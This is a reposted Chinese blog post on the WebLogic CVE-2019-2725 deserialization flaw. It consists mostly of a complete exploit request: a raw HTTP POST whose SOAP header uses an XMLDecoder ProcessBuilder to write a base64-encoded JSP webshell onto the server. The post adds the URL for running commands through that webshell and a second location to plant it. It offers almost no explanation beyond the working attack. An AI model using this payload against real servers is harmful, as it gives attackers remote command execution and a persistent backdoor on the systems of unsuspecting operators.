Weblogic wls9_async_response反序列化漏洞 (CVE-2019-2725)

本文转载自查看原文 2020-05-19 22:15 703 渗透测试

Weblogic wls9_async_response反序列化漏洞

http://192.168.1.2:7001/_async/AsyncResponseService

shell写到：
servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war

注：
数据包为post
content-type: text/xml

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.1.2:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=0
content-type: text/xml
Content-Length: 1383

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

访问
http://192.168.1.2:7001/_async/webshell.jsp?pwd=123&cmd=whoami

另一个位置
shell写到：
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Weblogic wls9_async_response 反序列化远程命令执行漏洞（CVE-2019-2725）复现 Weblogic反序列化漏洞（CVE-2019-2725） Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271） WebLogic任意文件上传漏洞(CVE-2019-2725) WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)复现 cve-2021-2394 weblogic反序列化漏洞分析 CVE-2017-3248——WebLogic反序列化漏洞利用工具 CVE-2020-14644 weblogic iiop反序列化漏洞漏洞复现|Dubbo反序列化漏洞CVE-2019-17564 Apache Dubbo反序列化漏洞（CVE-2019-17564）复现分析